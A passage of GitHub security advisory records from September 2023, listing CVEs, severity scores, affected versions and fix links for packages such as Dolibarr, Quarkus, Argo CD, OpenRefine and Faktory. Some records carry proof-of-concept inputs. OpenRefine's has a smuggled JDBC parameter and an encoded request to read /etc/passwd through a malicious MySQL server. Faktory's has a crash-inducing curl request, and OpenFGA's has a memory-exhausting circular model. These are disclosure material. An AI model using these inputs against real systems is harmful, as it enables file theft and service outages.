[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/schollz/croc/v9'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '9.6.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-43620'}, {'type': 'WEB', 'url': 'https://github.com/schollz/croc/issues/595'}, {'type': 'PACKAGE', 'url': 'https://github.com/schollz/croc'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2023/09/08/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/21/5'}]
{'cwe_ids': ['CWE-116'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-21T16:59:43Z', 'nvd_published_at': None}
1.4.0
GHSA-6773-rfjv-c54w
2023-09-22T19:47:23Z
2023-09-20T03:30:17Z
null
['CVE-2023-38886']
Dolibarr allows a remote privileged attacker to execute arbitrary code via a crafted command/script
An issue in Dolibarr ERP CRM v.17.0.1 and before allows a remote privileged attacker to execute arbitrary code via a crafted command/script.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'dolibarr/dolibarr'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '17.0.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38886'}, {'type': 'WEB', 'url': 'https://akerva.com/wp-content/uploads/2023/09/AKERVA_Security-Advisory_CVE-2023-38886_Dolibarr_RCE-1.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/Dolibarr/dolibarr'}, {'type': 'WEB', 'url': 'http://dolibarr.com'}]
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-21T17:03:31Z', 'nvd_published_at': None}
1.4.0
GHSA-95ch-p3gw-23qg
2023-09-07T13:59:30Z
2023-09-06T15:30:27Z
null
['CVE-2023-32672']
Apache Superset has incorrect authorization check
An Incorrect authorisation check in SQLLab in Apache Superset versions up to and including 2.1.0. This vulnerability allows an authenticated user to query tables that they do not have proper access to within Superset. The vulnerability can be exploited by leveraging a SQL parsing vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32672'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/ococ6nlj80f0okkwfwpjczy3q84j3wkp'}]
{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-07T13:59:30Z', 'nvd_published_at': None}
1.4.0
GHSA-4f4r-wgv2-jjvg
2023-09-21T16:58:20Z
2023-09-20T12:30:22Z
null
['CVE-2023-4853']
Quarkus HTTP vulnerable to incorrect evaluation of permissions
A flaw was found in Quarkus where HTTP security policies are not sanitizing certain character permutations correctly when accepting requests, resulting in incorrect evaluation of permissions. This issue could allow an attacker to bypass the security policy altogether, resulting in unauthorized endpoint access and possibly a denial of service.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-vertx-http'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.11.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-vertx-http'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.2.6.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-vertx-http'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '3.3.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-undertow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.11.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-undertow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.2.6.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-undertow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '3.3.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-csrf-reactive'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.11.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-csrf-reactive'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.2.6.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-csrf-reactive'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '3.3.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-keycloak-authorization'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.11.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-keycloak-authorization'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.2.6.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.quarkus:quarkus-keycloak-authorization'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.3.0'}, {'fixed': '3.3.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4853'}, {'type': 'WEB', 'url': 'https://github.com/quarkusio/quarkus/issues/35785'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:5170'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:5310'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:5337'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-4853'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/vulnerabilities/RHSB-2023-002'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2238034'}, {'type': 'PACKAGE', 'url': 'https://github.com/quarkusio/quarkus'}, {'type': 'WEB', 'url': 'https://github.com/quarkusio/quarkus/discussions/35940'}]
{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-21T16:58:20Z', 'nvd_published_at': None}
1.4.0
GHSA-g687-f2gx-6wm8
2023-09-11T12:59:48Z
2023-09-11T12:59:48Z
null
['CVE-2023-40584']
Argo CD repo-server Denial of Service vulnerability
### Impact All versions of ArgoCD starting from v2.4 have a bug where the ArgoCD repo-server component is vulnerable to a Denial-of-Service attack vector. Specifically, the said component extracts a user-controlled tar.gz file without validating the size of its inner files. As a result, a malicious, low-privileged user can send a malicious tar.gz file that exploits this vulnerability to the repo-server, thereby harming the system's functionality and availability. Additionally, the repo-server is susceptible to another vulnerability due to the fact that it does not check the extracted file permissions before attempting to delete them. Consequently, an attacker can craft a malicious tar.gz archive in a way that prevents the deletion of its inner files when the manifest generation process is completed. ### Patches A patch for this vulnerability has been released in the following Argo CD versions: * v2.6.15 * v2.7.14 * v2.8.3 ### Workarounds The only way to completely resolve the issue is to upgrade. #### Mitigations Configure RBAC (Role-Based Access Control) and provide access for configuring applications only to a limited number of administrators. These administrators should utilize trusted and verified Helm charts. ### For more information If you have any questions or comments about this advisory: * Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions) * Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd ### Credits This vulnerability was found & reported by GE Vernova – Amit Laish. The Argo team would like to thank these contributors for their responsible disclosure and constructive communications during the resolve of this issue
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/v2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.6.15'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/v2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.14'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/v2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/security/advisories/GHSA-g687-f2gx-6wm8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40584'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/commit/1391ba72149655e4884d357586d3201f15bc92dc'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/commit/b8f92c4ff226346624f43de3f25d81dac6386674'}, {'type': 'PACKAGE', 'url': 'https://github.com/argoproj/argo-cd'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/releases/tag/v2.6.15'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/releases/tag/v2.7.14'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/releases/tag/v2.8.3'}]
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-11T12:59:48Z', 'nvd_published_at': None}
1.4.0
GHSA-qjpw-rg56-jh8v
2023-09-20T22:19:24Z
2023-09-15T03:30:19Z
null
['CVE-2023-4978']
LibreNMS Cross-site Scripting vulnerability
Cross-site Scripting (XSS) - DOM in GitHub repository librenms/librenms prior to 23.9.0.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '23.9.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4978'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/commit/e4c46a45364cb944b94abf9b83f0558b2c4c2fb7'}, {'type': 'PACKAGE', 'url': 'https://github.com/librenms/librenms'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cefd9295-2053-4e6e-a130-7e1f845728f4'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-15T19:29:33Z', 'nvd_published_at': None}
1.4.0
GHSA-rxgf-r843-g53h
2023-09-13T14:08:47Z
2023-09-09T00:30:48Z
null
['CVE-2023-42276']
hutool Buffer Overflow vulnerability
hutool v5.8.21 was discovered to contain a buffer overflow via the component `jsonArray`.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'cn.hutool:hutool-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.8.21'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'cn.hutool:hutool-json'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.8.21'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-42276'}, {'type': 'WEB', 'url': 'https://github.com/dromara/hutool/issues/3286'}, {'type': 'WEB', 'url': 'https://github.com/dromara/hutool/commit/9ba8f9ca5dd32441f2e0f150cb22fa178bb771d3'}, {'type': 'PACKAGE', 'url': 'https://github.com/dromara/hutool'}]
{'cwe_ids': ['CWE-120'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-09-11T18:03:17Z', 'nvd_published_at': None}
1.4.0
GHSA-2hm9-h873-pgqh
2023-09-28T21:27:04Z
2023-09-28T21:27:04Z
null
['CVE-2023-43645']
OpenFGA Vulnerable to DoS from circular relationship definitions
## Overview OpenFGA is vulnerable to a DoS attack when certain Check calls are executed against authorization models that contain circular relationship definitions. When the call is made, it's possible for the server to exhaust resources and die. ## Am I Affected? Yes, if your store contains an authorization model that allows circular relationships. For example, with this model: ``` model schema 1.1 type user type group relations define memberA: [user] or memberB or memberC or memberD or memberE define memberB: [user] or memberA or memberC or memberD or memberE define memberC: [user] or memberA or memberB or memberD or memberE define memberD: [user] or memberA or memberB or memberC or memberE define memberE: [user] or memberA or memberB or memberC or memberD ``` This Check: `(user:anne, memberA, group:X)` can exhaust memory in the server. ## Fix Upgrade to v1.3.2 and update any offending models. **[BREAKING]** If your model contained cycles or a relation definition that has the relation itself in its evaluation path, then Checks and queries that require evaluation will no longer be evaluated on v1.3.2+ and will return errors instead. You will need to update your models to remove the cycles.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/openfga/openfga'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/openfga/openfga/security/advisories/GHSA-2hm9-h873-pgqh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-43645'}, {'type': 'WEB', 'url': 'https://github.com/openfga/openfga/commit/725296025fd81227c89525808652c6acd4a605f6'}, {'type': 'PACKAGE', 'url': 'https://github.com/openfga/openfga'}]
{'cwe_ids': ['CWE-835'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-28T21:27:04Z', 'nvd_published_at': None}
1.4.0
GHSA-wwfj-h843-3hrq
2023-09-25T21:42:01Z
2023-09-22T00:30:29Z
null
['CVE-2023-31718']
FUXA local file inclusion vulnerability
FUXA <= 1.1.12 is vulnerable to Local File Inclusion via `/api/download`.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'fuxa-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.12'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31718'}, {'type': 'WEB', 'url': 'https://github.com/MateusTesser/CVE-2023-31718'}, {'type': 'PACKAGE', 'url': 'https://github.com/frangoteam/FUXA'}, {'type': 'WEB', 'url': 'https://youtu.be/VCQkEGntN04'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-22T20:00:26Z', 'nvd_published_at': None}
1.4.0
GHSA-m4mm-pg93-fv78
2023-09-15T13:37:03Z
2023-09-14T15:31:23Z
null
['CVE-2023-1108']
Undertow denial of service vulnerability
A flaw was found in undertow. This issue makes achieving a denial of service possible due to an unexpected handshake status updated in SslConduit, where the loop never terminates.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.5.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.undertow:undertow-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.24.Final'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1108'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/pull/1457'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/commit/1302c8cf4476936802504efe0d36c58dcd954f78'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/commit/1b763064a41a30583b5df9a118898513007a70be'}, {'type': 'WEB', 'url': 'https://github.com/undertow-io/undertow/commit/ccc053b55f5de9872bc1a4999fd6aa85fc5e146d'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1184'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1185'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1512'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1513'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1514'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1516'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:3883'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:3884'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:3885'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:3888'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:3892'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:3954'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:4612'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2023-1108'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2174246'}, {'type': 'PACKAGE', 'url': 'https://github.com/undertow-io/undertow'}]
{'cwe_ids': ['CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-15T13:37:03Z', 'nvd_published_at': None}
1.4.0
GHSA-qqh2-wvmv-h72m
2023-09-20T19:05:52Z
2023-09-12T13:52:05Z
null
['CVE-2023-41886']
OpenRefine vulnerable to arbitrary file read in project import with mysql jdbc url attack
### Summary An arbitrary file read vulnerability allows any unauthenticated user to read the file on the server._ ### Details Hi,Team, i find openrefine support to import data from database,When use mysql jdbc to connect to database,It is vulnerable to jdbc url attacks,for example,unauthenticated attacker can read the file on the server. There are some differences in utilization depending on the version of the mysql-connector dependency on the server side. 1. mysql-connector-java version > 8.14 The default value of `allowLoadLocalInfile` on the server side is false in this case.We need to manually set this value to true in the connection string. Since the way to get the databaseurl in `com/google/refine/extension/database/mysql/MySQLConnectionManager.java` is to splice the individual configurations directly, we can set the `allowLoadLocalInfile` parameter after the other parameters(for example the `databaseName` parameter ). ![image](https://user-images.githubusercontent.com/24366795/262531956-ef8bb163-6692-4494-92f9-3b9bcffdf503.png) ![image](https://user-images.githubusercontent.com/24366795/262531716-95e7c9a6-601d-4157-bce9-c58d17a6e3ea.png) ![image](https://user-images.githubusercontent.com/24366795/262531614-a34f891f-acd2-4354-bbbe-96447a9dcbd1.png) 2. mysql-connector-java version <= 8.14 The default value of `allowLoadLocalInfile` on the server side is true in this case.so wo don't need do anything,Just connect to our malicious server. ### PoC env: centos 7 openrefine 3.7.4 jdk11 mysql-connector-java version 8.30.0 you can use the tool https://github.com/4ra1n/mysql-fake-server to running a malicious mysql server. ![image](https://user-images.githubusercontent.com/24366795/262536594-a62dbc2c-62d2-4b21-a351-5be7f506f852.png) for example,to read the /etc/passwd file. ![image](https://user-images.githubusercontent.com/24366795/262539711-f274a396-9c0a-4ace-b3af-3b4e5309ab00.png) set the `username` to `base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=` and `Database name` to `test?allowLoadLocalInfile=true#` (for mysql-connector-java version <= 8.14,just setting the database name normally) and test to connect your malicious mysql server. you can get the file in your fake-server-files directory. ![image](https://user-images.githubusercontent.com/24366795/262542538-c9f501a4-899f-4b57-89b9-b8dd42f535fb.png) ### Impact An arbitrary file read vulnerability allows any unauthenticated user to read the file on the server._
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.openrefine:database'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.5'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.7.4'}}]
[{'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/security/advisories/GHSA-qqh2-wvmv-h72m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41886'}, {'type': 'WEB', 'url': 'https://github.com/OpenRefine/OpenRefine/commit/2de1439f5be63d9d0e89bbacbd24fa28c8c3e29d'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenRefine/OpenRefine'}]
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-12T13:52:05Z', 'nvd_published_at': None}
1.4.0
GHSA-x4hh-vjm7-g2jv
2023-09-20T22:51:09Z
2023-09-20T22:51:09Z
null
['CVE-2023-37279']
Faktory Web Dashboard can lead to denial of service(DOS) via malicious user input
### Summary Faktory web dashboard can suffer from denial of service by a crafted malicious url query param `days`. ### Details The vulnerability is related to how the backend reads the `days` URL query parameter in the Faktory web dashboard. The value is used directly without any checks to create a string slice. If a very large value is provided, the backend server ends up using a significant amount of memory and causing it to crash. ### PoC To reproduce this vulnerability, please follow these steps: Start the Faktory Docker and limit memory usage to 512 megabytes for better demonstration: ``` $ docker run --rm -it -m 512m \ -p 127.0.0.1:7419:7419 \ -p 127.0.0.1:7420:7420 \ contribsys/faktory:latest ``` Send the following request. The Faktory server will exit after a few seconds due to out of memory: ``` $ curl 'http://localhost:7420/?days=922337' ``` ### Impact **Server Availability**: The vulnerability can crash the Faktory server, affecting its availability. **Denial of Service Risk**: Given that the Faktory web dashboard does not require authorization, any entity with internet access to the dashboard could potentially exploit this vulnerability. This unchecked access opens up the potential for a Denial of Service (DoS) attack, which could disrupt service availability without any conditional barriers to the attacker.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/contribsys/faktory'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/contribsys/faktory/security/advisories/GHSA-x4hh-vjm7-g2jv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37279'}, {'type': 'PACKAGE', 'url': 'https://github.com/contribsys/faktory'}]
{'cwe_ids': ['CWE-770', 'CWE-789'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-20T22:51:09Z', 'nvd_published_at': None}
1.4.0
GHSA-q8hr-4w58-985p
2023-09-14T16:30:20Z
2023-09-12T15:30:20Z
null
['CVE-2023-4914']
Cecil Path Traversal vulnerability
Relative Path Traversal in GitHub repository cecilapp/cecil prior to 7.47.1.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'cecil/cecil'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.47.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4914'}, {'type': 'WEB', 'url': 'https://github.com/cecilapp/cecil/commit/00dc79f10ce723034b7140d79f4ac731d1d902eb'}, {'type': 'PACKAGE', 'url': 'https://github.com/cecilapp/cecil'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cdd995b2-c983-428b-a73a-827b61b7c06b'}]
{'cwe_ids': ['CWE-22', 'CWE-23'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-12T19:31:17Z', 'nvd_published_at': None}
1.4.0
GHSA-c2hm-mjxv-89r4
2023-09-04T17:02:00Z
2023-09-04T17:02:00Z
null
[]
Multiple soundness issues in lexical
`lexical` contains multiple soundness issues: 1. [Bytes::read() allows creating instances of types with invalid bit patterns](https://github.com/Alexhuszagh/rust-lexical/issues/102) 1. [BytesIter::read() advances iterators out of bounds](https://github.com/Alexhuszagh/rust-lexical/issues/101) 1. [The `BytesIter` trait has safety invariants but is public and not marked `unsafe`](https://github.com/Alexhuszagh/rust-lexical/issues/104) 1. [`write_float()` calls `MaybeUninit::assume_init()` on uninitialized data, which is is not allowed by the Rust abstract machine](https://github.com/Alexhuszagh/rust-lexical/issues/95) The crate also has some correctness issues and appears to be unmaintained. ## Alternatives For quickly parsing floating-point numbers third-party crates are no longer needed. A fast float parsing algorith by the author of `lexical` has been [merged](https://github.com/rust-lang/rust/pull/86761) into libcore. For quickly parsing integers, consider `atoi` and `btoi` crates (100% safe code). `atoi_radix10` provides even faster parsing, but only with `-C target-cpu=native`, and at the cost of some `unsafe`. For formatting integers in a `#[no_std]` context consider the [`numtoa`](https://crates.io/crates/numtoa) crate. For working with big numbers consider `num-bigint` and `num-traits`.
[]
[{'package': {'ecosystem': 'crates.io', 'name': 'lexical'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.1.1'}]}]}]
[{'type': 'PACKAGE', 'url': 'https://github.com/Alexhuszagh/rust-lexical'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0055.html'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-04T17:02:00Z', 'nvd_published_at': None}
1.4.0
GHSA-4w2j-wj9q-6wpx
2023-09-29T20:39:44Z
2023-09-27T15:30:38Z
null
['CVE-2023-43828']
Subrion CMS Cross-site Scripting vulnerability in /panel/languages
A Cross-site scripting (XSS) vulnerability in /panel/languages/ of Subrion v4.2.1 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into 'Title' parameter.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'intelliants/subrion'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.2.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-43828'}, {'type': 'WEB', 'url': 'https://github.com/al3zx/xss_languages_subrion_4.2.1'}, {'type': 'PACKAGE', 'url': 'https://github.com/intelliants/subrion'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-29T20:39:44Z', 'nvd_published_at': None}
1.4.0
GHSA-jp3c-g46v-jg2c
2023-09-20T22:22:17Z
2023-09-15T03:30:19Z
null
['CVE-2023-4979']
LibreNMS Cross-site Scripting vulnerability
Cross-site Scripting (XSS) - Reflected in GitHub repository librenms/librenms prior to 23.9.0.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
